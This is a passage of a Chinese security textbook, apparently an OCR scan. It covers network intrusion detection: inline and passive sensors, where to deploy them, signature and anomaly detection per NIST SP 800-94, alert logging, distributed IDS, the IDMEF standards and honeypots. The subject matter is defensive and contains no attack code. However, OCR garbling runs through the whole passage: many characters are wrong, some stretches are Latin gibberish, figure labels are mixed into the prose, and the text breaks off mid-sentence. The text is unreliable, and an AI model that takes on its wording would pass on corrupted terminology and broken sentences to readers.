检测 网 络 上 流向 潜在 的 易 受 攻击 的 计算 机 系统 的 数据 包 流 量 ， 而 基于 主机 的 IDS 系统 检测 的 
是 主机 上 的 用 户 和 软件 活动 。 

NIDS 通常 包含 在 组 织 的 外 围 安 全 基础 结构 中 ,或 者 并 入 或 与 防火 墙 相关 联 。 它 们 通常 通 
过 分 析 恶 意 活动 的 流量 模式 和 流量 内 容 来 专注 于 监测 外 部 的 入 侵 企 图 。 随 着 加 密 技 术 的 广泛 应 
Fl, NIDS 已 经 无 法 看 到 数据 包 内 部 的 有 效 内 容 ， 这 也 妨碍 了 它们 发 挥 应 有 的 作用 .因此 ， 尽 
E NIDS 具有 非常 重要 的 作用 ,但 它们 也 仅仅 是 整套 解决 方案 的 一 环 。 典 型 的 NIDS 设备 包 
H: 大 量 传感器 用 来 监控 数据 包 流量 、 一 个 或 多 个 服务 器 负责 NIDS 管理 功能 ， 以 及 一 个 或 多 
个 管理 控制 台 提 供 人 机 交互 的 接口 。 分 析 流 量 模式 从 而 检测 入侵 的 工作 可 以 在 传感器 、 管 理 服 
务 器 或 在 二 者 上 组 合 完成 。 


8.5.1 ”网络 传 感 侨 的 类 型 


传 感 句 可 以 部 署 为 两 种 模式 之 一 : ARAA ARERR (inline sensor) 将 被 插入 
网 络 段 ， 以 使 正在 监控 的 流量 必须 通过 传感器 。 实 现 内 挫 传 感 器 的 一 种 方法 是 使 NIDS ERAR 
与 另 一 个 网 络 设备 (如 防火 墙 或 局 域 网 交换 机 ) 进行 逻辑 组 合 。 此 方法 的 优势 是 不 需要 其 他 额 





外 的 单独 人 硬件 设备 ， 只 需 NIDS 传 感 占 软件 。 男 一 种 方法 是 使 用 独立 的 内 骨 NIDS 传感器 。 使 
用 内 艇 传感器 的 主要 动机 是 使 它们 检测 到 一 个 攻击 时 能 进行 阻止 。 在 这 种 情况 下 该 设备 同时 执 
行人 侵 检 测 和 入 侵 防 御 功 能 。 

更 常用 的 是 被 动 传感器 (passive sensor)。 被 动 传感器 监控 网 络 流 量 的 备份 ， 实 际 的 流量 
并 没有 通过 这 个 设备 。 从 通信 流 的 角度 来 看 ， 被 动 传感器 比 内 符 传 感 器 更 有 效率 ， 因 为 它 不 会 
添加 一 个 额外 的 处 理 步 又 ， 额 外 的 处 理 步 骤 会 导致 数据 包 时 延 。 

图 8-4 给 出 了 一 种 典型 的 被 动 传 感 磊 配置 网 络 流量 


示意 图 。 传 感 器 通过 一 个 直接 的 物理 分 接 器 
监控 接口 
| cr, 混杂 模式 ) 





(tap) 连接 到 网 络 传输 介质 ， 如 光缆 。 分 接 器 
为 传感器 提供 正 由 介质 传送 的 所 有 网 络 流量 
的 一 个 副本 。 这 个 分 接 器 的 网 络 接口 卡 (NIC) 
通常 不 配置 IP 地址 。 所 有 进入 这 个 网 卡 的 流 NIDS 
量 都 是 在 没有 与 网 络 协 议 交 互 的 情况 下 收集 传感器 
的 。 传 感 器 连接 到 网 络 的 第 二 个 NIC 具有 了 P 

地 址 ， 使 传感器 能 与 NIDS 管理 服务 器 进行 






通信 。 

另 一 个 区 别 是 传感器 可 以 监测 有 线 网 ， yey 
也 可 以 监测 无 线 网 。 无 线 网 络 传感器 可 以 是 
内 其 的 ， 被 并 人 到 一 个 无 线 接 人 点 (Access 图 8-4 被 动 NIDS 传感器 


Point，AP)， 也 可 以 是 被 动 无 线 流 量 检测 磊 。 AR: 基于 [CREM06] 

这 些 传感器 需要 收集 和 分 析 无 线 协议 流量 ， 

这 样 才能 检测 针对 这 些 协议 的 攻击 。 针 对 协议 的 攻击 主要 包括 无 线 拒绝 服务 、 会 话 劫持 、AP 
假冒 。 仅 关注 无 线 网 络 的 NIDS 称 为 无 线 IDS (Wireless IDS，WIDS)。 无 线 传感器 可 以 是 一 个 
更 一 般 的 NIDS 的 组 成 部 分 ， 负 责 收 集 无 线 和 有 线 网 络 流量 的 数据 ; 或 者 是 分 布 式 IDS 的 组 成 
部 分 ， 负 责 关 联 主机 传感器 和 网 络 传感器 的 数据 。 


8.5.2 NIDS 传感器 部 署 


考虑 到 大 型 企业 具有 多 个 站 点 ， 每 个 站 点 有 一 个 或 多 个 局 域 网 与 所 有 网 络 相互 连 接 ， 即 通 
过 Internet 或 某 些 其 他 广域网 技术 进行 连接 。 对 一 个 全 面 的 NIDS 策略 来 说 ， 在 每 个 站 点 需要 
一 个 或 多 个 传感器 。 在 单个 站 点 ， 安 全 管理 员 的 关键 作用 是 确定 传 感 右 的 位 置 。 

图 8-5 给 出 了 可 能 的 几 种 情况 。 一 般 来 说 ， 这 是 大 型 企业 典型 的 配置 。 所 有 Internet 流量 
都 要 经 过 保护 整个 机 构 的 外 部 防火 墙 S。 从 外 部 来 的 流量 (如 需要 访问 诸如 Web 和 邮件 等 公共 服 
务 的 客户 和 供应 商 ) 都 被 监控 。 外 部 防火 墙 对 网 络 中 那些 只 允许 来 自 其 他 公司 站 点 的 用 户 访问 
的 部 分 也 提供 了 一 定 程度 的 保护 。 内 部 防火 墙 也 可 用 于 网 络 的 某 些 部 分 来 提供 更 具体 的 保护 。 

NIDS 传感器 通 种 的 位 置 是 恰好 在 外 部 防火 墙 (图 8-5 中 位 置 1 ) 之 内 。 此 位 置 有 许多 优点 : 

e 观测 源 自 外 部 的 攻击 ， 建 立 入 侵 网 络 的 外 围 防护 (外 部 防火 墙 )。 

o 强调 网 络 防 火 墙 策略 或 性 能 问题 。 

e 观测 可 能 针对 Web AR 4h ak FTP IRS EN LE. 

e 即使 进入 的 攻击 不 能 被 识别 ，IDS 有 时 也 可 以 识别 出 由 于 服务 器 遭受 攻击 而 输出 的 流量 。 


O 第 9 章 将 详细 讨论 防火 墙 。 从 本 质 上 讲 ， 防火墙 是 用 于 保护 其 内 部 一 个 或 多 个 互 连 的 网 络 的 ， 将 内 部 网 络 与 
Internet 和 其 他 外 部 网 络 隔 开 。 防 火 墙 是 通过 限制 流量 、 拒 绝 潜在 的 威胁 数据 包 实 现 对 内 部 网 络 的 保护 的 。 
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图 8-5 NIDS 传 感 硕 部署 实例 


如 果 不 将 NIDS 传感器 放 在 外 部 防火 墙 内 ， 安 全 管理 员 可 能 会 选择 在 外 部 防火 墙 与 
Internet 或 广域网 之 间 放 置 NIDS 传感器 (位 置 2 )。 在 此 人 位置， 传感器 可 以 监控 所 有 网 络 流量 ， 
而 不 进行 过 滤 。 此 方法 的 优点 如 下 : 

e 监控 来 自 Internet 上 针对 目标 网 络 的 攻击 文档 (document) 数 。 

e 监控 来 自 Internet 上 针对 目标 网 络 的 攻击 文档 类 型 。 

在 位 置 2 的 传 感 右 比 位 于 站 点 网 络 上 其 他 位 置 的 任何 传 感 句 具有 更 高 的 处 理 负担 。 

除了 在 网 络 边界 上 的 传 感 硕 ， 管 理 员 可 以 在 内 部 防火 墙 的 任意 一 侧 配置 一 个 防火 墙 以 及 一 个 
或 多 个 传感器 来 保护 支持 内 部 服务 器 和 数据 库 资 源 等 的 主干 网 络 (位 置 3 )。 此 位 置 的 好 处 如 下 : 

e 监控 一 个 网 络 的 大 量 流量 ， 从 而 提高 发 现 攻击 的 概率 。 

e 检测 授权 用 户 在 企业 的 安全 范围 内 的 非 授 权 活 动 。 

因此 ， 在 位 置 3 的 传感器 既 能 监控 内 部 攻击 ， 也 能 监控 外 部 攻击 。 因 为 传感器 仅仅 针对 该 
网 站 的 一 部 分 设备 监控 流量 ， 它 可 以 调整 为 针对 特定 的 协议 和 攻击 类 型 ， 从 而 减少 处 理 负担 。 

最 后 ， 一 个 网 站 的 网 络 设施 可 能 包括 文 持 一 个 部 门 所 有 的 用 户 工 作 站 和 服务 需 的 分 离 的 
局 域 网 。 管 理 员 可 以 配置 一 个 防火 墙 和 NIDS 传感器 对 所 有 这 些 网 络 提供 额外 的 保护 或 者 将 
人 事 和 财务 网 络 等 关键 子 系统 作为 保护 目标 (位置 4 )。 后 一 种 情况 使 用 的 传感器 提供 了 以 下 
好 处 : 

e 检测 针对 关键 系统 和 资源 的 攻击 。 

e 人 允许 将 有 限 的 资源 集中 到 具有 最 大 价值 的 网 络 资产 中 。 

与 位 置 3 的 传感器 一 样 ， 位 置 4 的 传感器 可 以 调整 为 针对 特定 的 协议 和 攻击 类 型 ， 这 样 可 
以 减少 处 理 负 担 。 


8.5.3 ”入 侵 检测 技术 


与 基于 主机 的 人 侵 检测 一 样 ， 基 于 网 络 的 人 侵 检 测 使 用 特征 检测 和 异常 检测 技术 。 与 
HIDS 不 同 ， 基 于 异常 检测 技术 的 NIDS 有 许多 商业 产品 [GARC09]， 其 中 最 为 出 名 的 一 款 是 
统计 数据 包 异 常 检测 引擎 (Statistical Packet Anomaly Detection Engine，SPADE)， 这 是 我 们 后 
面 要 讨论 的 Snort 系统 的 一 个 可 用 插件 。 
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特征 检测 NIST SP 800-94 (入 侵 检 测 和 防御 系统 指南 ，2012 年 7 月 ) 列 出 以 下 作为 适合 
于 特征 检测 的 攻击 类 型 的 示例 : 

e 应 用 层 侦 察 和 攻击 (application layer reconnaissance and attack): 大 多 数 NIDS 技术 
都 要 分 析 几 十 个 应 用 协议 ， 通 篆 分 析 的 协议 包括 动态 主机 配置 协议 ( Dynamic Host 
Configuration Protocol, DHCP), DNS, Finger, FTP, HTTP, Internet 消息 访问 协议 (Internet 
Message Access Protocol, IMAP), Internet 中 继 聊 天 ( Internet Relay Chat, IRC), W243 
件 系 统 ( Network File System, NFS), [Af Jay Hi ( Post Office Protocol, POP), rlogin/ 
rsh、 远 程 过 程 调 用 (Remote Procedure Call，RPC)、 会 话 发 起 协议 (Session Initiation 
Protocol, SIP), IRA #74. AR (Server Message Block, SMB), SMTP, SNMP, Telnet 
和 简单 文件 传输 协议 (Trivial File Transfer Protocol，TFTP)， 以 及 数据 库 协 议 、 即 时 消 
奶 应 用 和 对 称 文件 共享 软件 。NIDS 主要 查找 已 被 标识 为 面向 这 些 协议 的 攻击 模式 。 攻 
击 的 实例 包括 绥 冲 区 溢出 、 口 令 猜 测 和 恶意 软件 传输 等 。 

e 传输 层 侦察 和 攻击 (transport layer reconnaissance and attack): NIDS 分 析 TCP 和 UDP 
流量 ， 也 可 能 是 其 他 传输 层 协 议 。 攻 击 的 例子 有 异常 数据 包 雁 片 、 易 受 攻 击 端 口 扫描 
和 TCP 特定 攻击 (如 SYN 洪 泛 )。 

e 网 络 层 侦察 和 攻击 (network layer reconnaissance and attack): NIDS 在 这 一 层 通常 分 析 
IPv4, IPv6, ICMP 和 IGMP。 攻 击 的 实例 是 IP 地 址 欺骗 和 非法 的 IP 头 部 值 。 

© 意外 应 用 程序 服务 (unexpected application service): NIDS 试图 确定 传输 连接 上 的 活动 
是 否 与 预期 的 应 用 协议 一 致 。 一 个 实例 是 主机 运行 未 经 授权 的 应 用 服务 。 

© 策略 违背 (policy violation): 实例 包括 使 用 不 适当 的 Web 站 点 和 使 用 禁用 的 应 用 协议 。 

异常 检测 技术 NIST SP 800-94 列 出 以 下 实例 ， 这 些 类 型 的 攻击 都 适合 用 异常 检测 进行 

识别 : 

e 拒绝 服务 ( DoS) 攻击 : 这 种 攻击 涉及 或 者 显著 提高 数据 包 流 量 , 或 者 显著 增加 连接 尝 
斌 次数， 试图 搞 垮 目标 系统 。 第 7 章 中 分 析 过 这 些 攻击 。 异 常 检测 适用 于 此 类 攻击 。 

e 扫描 (scanning): 当 攻 击 者 通过 发 送 不 同 种 类 的 数据 包 探 测 目 标 网 络 或 系统 时 ， 扫 摘 
攻击 发 生 。 使 用 从 目标 接收 到 的 反馈 ， 攻 击 者 可 以 了 解 系统 的 许多 特征 和 安全 漏洞 。 
因此 ， 对 攻击 者 来 说 ， 扫 摘 攻 击 作 为 一 种 目标 识别 工具 。 通 过 应 用 层 〈 如 标题 抓 取 
(banner grabbing) ©), 14] (如 TCP 和 UDP 端口 扫描 ) 和 网 络 层 (如 ICMP 扫描 ) 
的 非典 型 流量 模式 ， 可 以 检测 到 扫描 。 

。 蠕虫 : 可 以 以 多 种 方式 检测 到 蠕虫 9 在 主机 之 间 传 播 。 某 些 蠕 虫 快速 传播 并 占用 大 量 的 
市 宽 。 蜂 虫 还 有 一 些 可 能 被 检测 到 的 特征 ， 比 如 它们 可 能 导致 通常 不 通信 的 主机 相互 
通信 ， 并 且 它 们 也 可 能 导致 主机 使 用 它们 通常 不 使 用 的 端口 。 很 多 蠕虫 也 执行 扫 摘 。 
第 6 章 已 经 详细 讨论 了 蠕虫 。 

状态 协议 分 析 (SPA) NIST SP 800-94 详细 描述 了 这 种 异常 检测 技术 ， 其 中 检测 是 通过 比 

较 观 测 的 网 络 流量 与 预定 的 、 供 应 商 提 供 的 正常 的 流量 特征 实现 的 。 这 与 基于 组 织 特定 的 流量 
特征 的 异常 检测 技术 不 同 。SPA 通过 推断 和 追 踊 网 络 、 传 输 和 应 用 协议 的 状态 ， 保 证 网 络 活动 
按 预 期 发 展 。SPA 的 一 个 主要 缺点 是 它 所 需要 的 高 资源 占用 。 


O 通常， 标题 抓 取 由 初始 化 到 网 络 服务 器 的 连接 和 记录 会 话 开 始 返回 的 数据 两 个 步骤 组 成 。 此 信息 可 以 指定 
应 用 程序 名 、 版 本 号 ， 甚 至 包括 运行 服务 的 操作 系统 [DAMR03]。 

O ”蠕虫 是 一 种 程序 ， 可 以 复制 自身 并 通过 网 络 连接 在 计算 机 间 发 送 拷 贝 。 其 一 旦 到 达 ， 该 蠕虫 程序 会 被 激活 
来 复制 和 再 次 传播 ， 除 了 传播 ， 该 蠕虫 病毒 通常 执行 某 些 有 害 的 功能 。 
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8.5.4 


警报 日 志 记 录 


当 传 感 器 检测 到 潜在 危险 时 ， 它 将 发 送 一 个 警报 并 记录 与 事件 相关 的 信息 。NIDS 分 析 模 
块 可 以 使 用 此 信息 来 优化 入 侵 检 测 参 数 和 算法 。 安 全 管理 员 可 以 使 用 此 信息 来 设计 保护 技术 。 
由 NIDS 传感器 记录 的 典型 信息 如 下 : 


时 间 戳 〈 通 常 是 日 期 和 时 间 ) 。 
连接 或 会 话 ID 号 (通常 是 分 配给 每 个 TCP 连接 或 无 连接 协议 的 数据 包 组 的 连续 的 或 
唯一 的 号 码 )。 


事件 或 警报 类 型 。 

分 级 (如 优先 级 、 严 重 性 、 影 响 和 信任 等 )。 

网 络 层 、 传 输 层 和 应 用 层 协议 。 

JAA H AY IP 地 址 。 

源 和 目的 TCP 或 UDP 端口 ， 或 者 ICMP 类 型 和 代码 。 
通过 连接 传输 的 字 节 数 。 


已 解码 的 有 效 载荷 数据 ， 如 应 用 程序 请 求 和 啊 应 。 
状态 相关 信息 《如 经 过 身份 验证 的 用 户 名 )。 


8.6 分布 式 或 混合 式 入 侵 检测 


在 最 近 几 年 ，IDS 通信 的 概念 已 演变 成 使 用 分 布 式 系统 的 合作 方案 来 发 现 人 侵 ， 并 适应 不 断 
变化 的 攻击 模式 。 这 些 方 案 将 HIDS 的 进程 与 数据 细节 以 及 NIDS 的 事件 与 数据 集成 到 一 个 中 央 


IDS 中 ， 


中 央 IDS 通过 对 这 些 可 以 互补 的 信息 进行 统一 的 管理 和 关联 ， 在 企业 的 IT 基础 设施 中 


发 现 人 侵 并 做 出 啊 应 。 对 于 IDS、 防 火 墙 、 病 毒 和 蠕虫 检测 需 等 系统 ， 始 终 存 在 两 个 关键 问题 。 
首先 ， 这 些 工具 无 法 识别 新 威胁 或 发 现 已 存在 的 威胁 的 新 改进 。 其 次 ， 难 以 提供 足够 快速 的 更 
新 方案 处 理 迅速 传播 的 攻击 。 对 外 围 防御 (如 防火 墙 )， 另 一 个 问题 是 现代 企业 边界 定义 很 松散 ， 
主机 通常 能 够 移入 和 迁 出 ， 例 如 使 用 无 线 技术 通信 的 主机 和 可 以 插入 网 络 端 口 的 便携 电脑 。 

攻击 者 以 多 种 方式 利用 这 些 问 题 。 更 为 传统 的 攻击 方法 是 ， 开 发 蠕虫 和 其 他 恶意 软件 ， 它 
们 迅速 传播 ， 引 发 其 他 攻击 (例如 拒绝 服务 攻击 )， 在 防御 局 动 之 前 ， 以 绝对 优势 力量 进行 攻 
击 。 这 种 攻击 方法 仍然 流行 。 但 最 近 攻 击 者 增加 了 一 种 完全 不 同 的 方法 : 降低 攻击 传播 的 速 
度 ， 使 传统 的 算法 更 难 检测 [ANTH07]。 

对 付 此 类 攻击 的 一 种 方法 是 开发 合作 系统 以 识别 基于 多 个 细微 的 线索 的 攻击 ， 然 后 快速 适 
应 。 在 这 个 方法 中 ,异常 检测 右 在 本 地 节点 查找 异常 活动 的 证 据 。 例 如 ， 一 台 计 算 机 通常 只 需 
几 个 网 络 连接 ， 如 果 突 然 显示 以 较 高 的 速率 请 求 网 络 连接 ， 则 会 被 怀疑 攻击 正在 进行 。 仅 和 赁 此 
证 据 ， 本 地 系统 如 果 做 出 受到 可 疑 攻击 的 反应 (如 断 开 与 网 络 的 连接 并 发 出 警报 )， 则 有 误 报 
的 风险 ; 但 如 果 忽略 该 攻击 或 等 待 进 一 步 的 证 据 ， 则 有 漏 报 风险 。 在 自 适 应 协作 系统 中 ， 本 地 
节点 不 会 将 其 怀疑 通过 对 等 “gossip ”协议 通知 其 他 机 器 ， 而 是 以 概率 的 形式 告知 其 他 计算 机 : 
网 络 正 在 受到 攻击 。 如 果 一 台 计 算 机 收 到 足够 多 这 些 消 息 ， 且 超过 一 个 国 值 ， 则 计算 机 认为 攻 

击 正在 进行 并 做 出 响应 。 计 算 机 会 从 本 地 响应 来 保护 自身 并 将 警报 发 送 到 中 央 系 统 。 

这 种 方法 的 一 个 实例 是 由 英特尔 公司 开发 的 称 为 “自治 企业 安全 ”的 方案 [AGOS06]。 
图 8-6 说 明了 这 种 方法 。 这 种 方法 不 单纯 依赖 于 外 围 的 防范 机 制 ， 如 防火 墙 或 单独 的 基于 主机 
的 防护 。 相 反 ， 每 个 终端 主机 和 每 个 网 络 设备 (如 路 由 器 ) 都 被 认为 是 潜在 的 传感器 并 且 能 够 
安装 传感器 软件 模块 。 这 种 以 分 布 式 配 置 的 传感器 可 以 交换 信息 以 确定 网 络 的 状态 ( 即 攻击 是 
否 在 进行 )。 
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PEP = 策略 实施 点 
DDI = 分 布 式 检 测 和 推断 
图 8-6 一 个 自治 的 企业 安全 系统 的 整体 体系 结构 


英特尔 公司 是 基于 下 面 的 动机 提出 这 种 方法 的 : 

1. IDS 有 选择 的 部 署 可 能 会 错过 基于 网 络 的 攻击 或 者 识别 正在 进行 的 攻击 会 很 慢 。 使 用 
多 个 IDS 共享 信息 可 以 提供 更 高 的 覆盖 率 和 更 快 的 攻击 响应 ， 尤 其 对 缓慢 增长 的 攻击 〈 如 
[BAIL05]、[RAJA05])。 

2. 主机 级 的 网 络 流量 分 析 提 供 了 一 种 与 网 络 设备 (如 路 由 需 ) 中 发 现 的 网 络 流量 相 比 其 流 
量 更 少 的 一 种 环境 。 因 此 ， 攻 击 模式 将 更 突出 ， 能 够 有 效 地 提供 较 高 的 信 噪 比 (signal-to-noise 
ratio ) 。 

3. 基于 主机 的 检测 器 可 以 使 用 更 丰富 的 数据 集 ， 使 用 主机 的 应 用 程序 数据 作为 本 地 分 类 各 
的 输入 。 

NIST SP 800-94 指出 ， 分 布 式 或 混合 式 IDS 可 以 使 用 单个 供应 商 的 多 种 产品 来 构建 ， 其 目 
的 在 于 共享 和 交换 数据 。 比 如 专业 的 安全 信息 和 事件 管理 (SIEM) 软件 也 可 以 导入 和 分 析 来 目 
各 种 各 样 的 传感器 和 产品 的 数据 。 这 类 软件 依赖 于 标准 的 协议 ， 比 如 下 一 节 要 介绍 的 入侵 检测 
消息 交换 格式 (Intrusion Detection Message Exchange Format)。 通 过 对 比 可 以 帮助 我 们 阐明 分 
布 式 方法 的 优点 。 假 定 一 台 主 机 受到 的 是 一 种 延长 (Prolonged) 攻击 并 且 主 机 配置 为 最 大 限度 
地 减少 误 报 。 在 攻击 的 前 期 ， 因 为 误 报 的 风险 很 高 ， 所 以 没有 听 到 报警 。 如 果 攻 击 仍然 继续 ， 
攻击 正在 进行 的 证 据 将 更 为 明显 ， 随 之 误 报 的 风险 下 降 。 然 而 很 长 时 间 已 经 过 去 了 。 现 在 考虑 
多 个 本 地 传感器 ， 将 它们 每 个 怀疑 进行 的 攻击 进行 协作 处 理 。 因 为 许多 系统 看 到 相同 的 证 据 ， 
可 以 以 低 误 报 风险 发 布 报警 。 因 此 ， 我 们 不 是 使 用 很 长 一 段 时 间 而 是 使 用 大 量 的 传 感 顺 ， 来 减 
少 误 报 并 检测 攻击 。 许 多 供应 商 现在 也 提供 这 种 类 型 的 产品 。 

我 们 现在 总 结 一 下 此 方法 的 主要 做 法 ， 如 图 8-6 所 示 。 中 央 系 统 配 置 了 一 组 默认 的 安全 策 
上 略 ， 这 些 策略 根据 分 布 式 传感器 的 输入 进行 自 适 应 ， 将 具体 动作 传递 给 分 布 式 系 统 中 各 种 平 
台 。 设 备 的 特定 策略 包括 立即 采取 动作 或 对 参数 设置 进行 调整 。 中 央 系 统 也 能 与 所 有 调整 计时 
和 协作 gossip 消息 内 容 的 平台 交流 协作 策略 。 三 种 类 型 的 输入 指导 中 央 系 统 的 动作 : 
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e 摘要 事件 (summary event): 由 中 间 采 集 点 (如 防火 墙 、IDS 或 为 企业 网 络 特定 网 段 提 
HEARS AO ARS at) 采集 的 来 源 不 同 的 事件 。 这 些 事 件 被 总 结 以 便 交 付 给 中 央 策 略 系统 。 

e DDI 事件 (DDI event): 分 布 式 检测 和 推断 ( Distributed Detection and Inference, 
DDI) 事件 是 当 gossip 流量 使 平台 得 出 攻击 正在 进行 的 结论 时 所 生成 的 警报 。 

e PEP 事件 (PEP event): 策略 实施 点 (Policy Enforcement Plint, PEP) 位 于 可 信和 的、 
自 防 御 的 平台 和 智能 IDS 中 。 这 些 系 统 关 联 分 布 式 信息 、 本 地 决策 和 单个 设备 动作 
来 检测 在 主机 级 别 无 法 识别 的 入 侵 。 


8.7 ”入 侵 检 测 交换 格式 


为 了 促进 可 以 运行 在 各 种 平台 和 环境 的 分 布 式 IDS 的 开发 ， 需 要 制定 支持 协同 工作 能 力 
的 标准 。 这 些 标准 是 IETF 人 侵 检 测 工作 组 的 工作 重点 ， 旨 在 为 入 侵 检 测 和 啊 应 系统 ， 以 及 需 
要 与 其 他 机 器 交互 的 管理 系统 的 共享 信息 定义 数据 格式 和 交换 过 程 。 该 工作 组 在 2007 年 发 布 
SUF RFC: 
e 入 侵 检 测 消息 交换 要 求 (Intrusion Detection Message Exchange Requirements, RFC 4766 ) : 
这 份 文档 定义 了 入 侵 检 测 消 息 交 换 格式 (Intrusion Detection Message Exchange 
Format, IDMEF) 的 要 求 ， 同 时 也 规定 了 IDMEF 通信 协议 的 要 求 。 
e 入 侵 检 测 消息 交换 格式 (Intrusion Detection Message Exchange Format, RFC 4765 ) : 
这 份 文档 描述 了 入 侵 检 测 系 统 导 出 信息 时 的 一 个 数据 模型 ， 并 解释 了 使 用 这 个 模型 
的 基本 原理 。 文 档 同 时 给 出 了 该 数据 模型 使 用 可 扩展 标记 语言 ( Extensible Markup 
Language, XML) 的 一 个 实现 。 另 外 ，XML 文档 类 型 定义 (Document Type Definition ) 
正在 开发 当中 ,已 经 给 出 一 个 示例 。 
入 侵 检 测 交 换 协 议 ( Intrusion Detection Exchange Protocol, RFC 4767): 这 份 文档 描述 
了 入 侵 检 测 交换 协议 ( IDXP)。 这 是 在 人 侵 检测 系统 之 间 进 行 数 据 交 换 的 应 用 层 协议 。 
IDXP 支持 基于 面向 连接 协议 的 相互 授权 、 完 整 性 和 可 信人 性 。 
图 8-7 说 明了 入 侵 检测 消息 交换 方法 所 基于 的 模型 的 关键 元 素 。 此 模型 不 对 应 任何 特定 的 
产品 或 实现 ,但 其 功能 组 件 是 所 有 IDS 的 关键 元 素 。 功 能 组 件 如 下 所 述 : 





276 图 8-7 ”入 侵 检测 消息 交换 模型 
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e 数据 源 (datasource): IDS 用 来 检测 未 授权 或 非 预 期 活动 的 原始 数据 。 常 见 的 数据 源 包 
括 网 络 数据 包 、 操 作 系 统 审计 日 志 、 应 用 程序 审计 日 志和 系统 生成 的 校 验 和 数据 。 
o 传感器 (sensor): 从 数据 源 采 集 数 据 。 传 感 器 将 事件 转发 给 分 析 器 。 
e 分 析 器 (analyzer); 用 来 分 析 传 感 器 采集 的 标记 为 未 授权 或 非 预期 的 活动 或 安全 管理 员 
感 兴趣 事件 的 数据 的 ID 组 件 或 进程 。 在 许多 现 有 IDS 中 ,传感器 和 分 析 器 是 同一 组 件 
的 一 部 分 。 
e 管理 员 (administrator): 对 设置 企业 的 安全 策略 、 决 策 部 署 和 IDS 配置 负 全 部 责任 的 
人 。 他 与 该 IDS 的 操作 员 可 以 是 同一 个 人 ， 也 可 以 不 是 。 在 茶 些 组 织 ， 管 理 员 属 于 网 
络 或 系统 管理 组 。 而 在 其 他 组 织 ， 这 是 一 个 独立 的 职位 。 
e 管理 器 (manager): 操作 员 用 来 管理 ID 系统 各 种 组 件 的 ID 组 件 或 进程 。 管 理 功能 通 
常 包括 传感器 配置 、 分 析 器 配置 、 事 件 通知 管理 、 数 据 合 并 和 报告 。 
e 操作 员 (operator): IDS 管理 需 的 主要 用 户 。 操 作 员 通常 监控 IDS 的 输出 并 启动 或 建议 
进一步 的 操作 。 
在 此 模型 中 ， 人 和信 侵 检 测 按 以 下 方式 进行 。 传 感 句 监控 数据 源 以 查找 可 疑 的 活动 ( activity ), 
如 显示 意外 远程 访问 活动 的 网 络 会 话 、 表 明 用 户 试图 访问 未 被 授权 访问 的 文件 的 操作 系统 日 志 
条 目 、 表 明 连 续 登 录 失 败 的 应 用 程序 日 志文 件 等 。 传 感 器 将 可 疑 的 活动 以 事件 (event) 的 形式 
发 送 到 分 析 器 。 事 件 描述 了 给 定时 间 段 内 的 活动 。 如 果 分 析 需 确定 对 该 事件 感 兴趣 ， 它 将 发 送 
警报 (alert) 通知 管理 絮 组 件 ， 其 中 包含 检测 到 的 异常 活动 及 其 发 生 时 的 细节 信息 。 管 理 右 组 
FERE RAKA (notification), MA (response) 由 管理 器 组 件 或 操作 员 自 动 启动 。 响 应 的 
实例 包括 将 活动 记 和 日志， 记录 描述 该 事件 的 (来 自 数 据 源 的 ) 原始 数据 ， 终 止 网 络 、 用 户 或 
应 用 会 话 ， 以 及 更 改 网 络 或 系统 访问 控制 策略 。 安 全 策略 (security policy) 是 预定 义 的 、 格 式 
化 文档 的 陈述 ， 它 定义 了 哪些 活动 能 在 组 织 的 网 络 上 或 在 特定 主机 进行 ， 以 满足 组 织 的 要 求 。 
其 中 包括 哪些 主机 将 拒绝 外 部 网 络 的 访问 ， 但 并 不 仅 限 于 此 。 
此 规范 定义 了 事件 和 变更 信息 的 格式 、 消 息 类 型 以 及 入 侵 检测 信息 交流 的 交换 协议 。 
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e 转移 攻击 者 对 重要 系统 的 访问 。 

e 收集 有 关 攻 击 者 活动 的 信息 。 

e 避 | 诱 攻击 者 在 系统 中 逗留 足够 长 的 时 间 ， 以 便于 管理 员 对 此 攻击 做 出 响应 。 

这 些 系统 充满 了 虚构 的 信息 ， 这 些 信息 看 起 来 很 有 价值 ， 但 系统 的 合法 用 户 无 法 访问 。 因 
此 ,任何 对 蜜 钠 的 访问 都 是 可 疑 的 。 蜜 锡 系 统 装 备 了 敏感 的 监控 器 和 事件 记录 右 ， 用 于 检测 这 
些 访问 和 收集 有 关 攻 击 者 的 活动 信息 。 因 为 任何 针对 蜜 钠 的 攻击 在 攻击 者 看 来 都 是 成 功 的 ， 所 
以 管理 员 有 时 间 来 调动 、 记 录 并 跟踪 攻击 者 而 不 必 暴 露 生 产 系 统 。 

密 钢 是 一 种 没有 产 出 的 资源 。 网 络 以 外 的 任何 人 与 蜜 钢 进 行 交 互 都 没有 合法 的 理由 。 因 
此 ， 任 何 与 蜜 饶 系 统 通信 的 尝试 很 可 能 是 一 个 探测 、 扫 描 或 者 攻击 。 相 反 ， 如 果 一 个 蜜 饶 发 起 
对 外 通信 ， 则 系统 可 能 已 被 破坏 。 

蜜 饶 通 常 分 为 低 交 互 蜜 缸 和 高 交互 蜜 饶 。 

e 低 交互 蜜 缸 (low interaction honeypot): 该 类 蜜 饶 由 能 够 模拟 特定 IT 服务 或 系统 的 软件 

包 构 成 ， 它 足以 提供 一 种 真实 的 初级 交互 ， 但 是 却 无 法 提供 所 模拟 服务 或 系统 的 全 部 
功能 。 
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e 高 交互 蜜 缸 (high interaction honeypot): 该 类 密 饮 是 一 个 汕 有 完整 操作 系统 、 服 务 以 及 
应 用 程序 的 真实 系统 ， 被 部 署 在 攻击 者 能 够 访问 的 地 方 。 

高 交互 蜜 饶 是 一 个 更 为 真实 的 目标 ， 很 有 可 能 消耗 掉 攻 击 者 更 长 的 时 间 。 但 是 它 需要 极 大 
的 资源 ， 并 且 一 旦 被 攻破 ， 就 可 能 被 用 来 发 起 对 其 他 系统 的 攻击 。 对 于 运行 蜜 缸 的 组 织 来 说 ， 
很 有 可 能 导致 麻烦 的 法 律 或 声誉 问题 。 低 交互 蜜 饶 提 供 了 一 个 低 真 实 度 的 目标 ， 它 能 够 在 攻击 
早期 识别 一 些 使 用 本 章 前 面 讨 论 的 攻击 技术 的 和 人 侵 者 。 通 党 来 说 ， 这 类 蜜 饶 作 为 一 个 为 即将 
发 生 的 攻击 提供 报警 功能 的 分 布 式 IDS MAE AEI T o “Ere H” (The Honeypot Project) 
为 这 类 系统 提供 了 大 量 的 资源 和 软件 包 。 

最 初 的 工作 是 使 用 具有 P 地 址 的 单个 蜜 挫 计算 机 引诱 黑客 。 最 近 的 研究 集中 在 构建 整个 
蜜 饶 网 络 ， 用 来 模拟 一 个 企业 ， 包 括 会 使 用 到 的 实际 或 模拟 的 通信 量 和 数据 。 一 旦 黑客 进入 这 
